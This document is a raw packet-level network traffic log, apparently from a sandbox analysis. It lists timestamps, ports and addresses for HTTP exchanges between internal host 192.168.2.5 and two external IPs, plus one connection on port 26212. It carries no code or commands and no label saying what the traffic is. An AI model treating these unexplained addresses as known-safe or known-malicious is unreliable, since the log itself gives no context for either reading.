Sep 27, 2024 04:21:16.621809006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.621814966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.621824980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.621829033 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.621831894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.621870995 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.621915102 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622045040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622064114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622073889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622086048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622117043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622117043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622131109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622142076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622157097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622173071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622188091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622205019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622214079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622214079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622235060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622235060 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622375965 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622386932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622399092 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622428894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622428894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622447014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622503996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622515917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622529030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622539997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622550011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.622565985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622565985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622565985 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.622592926 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623357058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623411894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623414040 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623421907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623435020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623445988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623454094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623465061 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623466969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623477936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623487949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623500109 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623503923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623544931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623544931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623578072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623589039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623614073 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623640060 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623651028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623662949 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623678923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623678923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623683929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623696089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623708010 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.623708010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623708010 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623749971 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.623749971 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624016047 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624027014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624037027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624057055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624057055 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624067068 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624083042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624103069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624103069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624140024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624140024 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624154091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624201059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624201059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624381065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624391079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624408007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624418974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624428988 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624439955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624439955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624444008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624455929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624537945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624548912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624560118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624576092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624577045 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624602079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624602079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624614000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624625921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624636889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624660969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624660969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624702930 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624773979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624784946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.624830961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.624830961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.627176046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.627186060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.627209902 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.627229929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.627262115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.627264977 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.627264977 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.627275944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.627295017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.627315044 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.627338886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.627351046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.627361059 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.627374887 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.627407074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.627407074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.642422915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.642445087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.642457962 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.642486095 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.642529011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.642898083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.642947912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.642949104 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.642960072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.642990112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.642990112 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.643001080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.643024921 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.643049955 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.651186943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651202917 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651213884 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651225090 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651243925 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651254892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651259899 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651267052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651278019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651289940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651297092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651304007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651319981 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651333094 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651345968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651351929 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651359081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651371956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651398897 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651407957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651421070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651453018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651489019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651492119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651500940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651513100 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651525021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651525021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651537895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651549101 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651563883 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651571035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651582003 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651595116 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651612997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651623964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651629925 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651658058 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651690006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651701927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651714087 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651726007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651727915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651747942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.651758909 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.651787996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.661175013 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:16.669609070 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669622898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669632912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669644117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669655085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669666052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669673920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.669677973 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669688940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669694901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669699907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669728994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.669739008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669751883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669754028 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.669771910 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669780970 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.669783115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669795990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669814110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.669842958 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.669903994 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669915915 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.669949055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670033932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670047045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670057058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670082092 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670115948 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670171022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670181990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670211077 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670241117 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670358896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670371056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670380116 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670391083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670398951 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670407057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670418978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670423985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670470953 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670527935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670540094 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670548916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670561075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670568943 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670569897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670582056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670607090 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670624971 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670685053 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670696020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670706034 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670716047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670726061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670727968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670761108 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670861006 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670871973 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670881987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670898914 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670901060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670911074 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670922041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670932055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.670939922 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.670974016 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671003103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671020031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671030045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671077967 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671092033 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671180964 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671191931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671202898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671212912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671224117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671303988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671319008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671331882 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671339989 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671350956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671413898 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671519041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671530008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671540022 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671551943 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671561003 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671571970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671580076 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671608925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671658993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671669960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671680927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671691895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671700001 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671725035 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671827078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671838045 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671849012 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671857119 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.671873093 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.671902895 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.672795057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.672806978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.672820091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.672830105 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.672842026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.672841072 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.672854900 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.672866106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.672869921 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.672899008 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.672915936 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.672940969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.672982931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.673094988 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.673106909 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.673116922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.673126936 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.673135996 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.673137903 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.673151970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.673152924 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.673165083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.673197985 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.673228025 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.673856974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.673902035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.673912048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.673913956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.673943043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.673966885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.673979044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.673990011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.674000978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.674037933 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.674089909 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.674256086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:16.674297094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:16.676923037 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.676934958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.676947117 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.676971912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.676994085 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:16.676997900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:16.677010059 CEST	80	49724	176.113.115.95	192.168.2.5
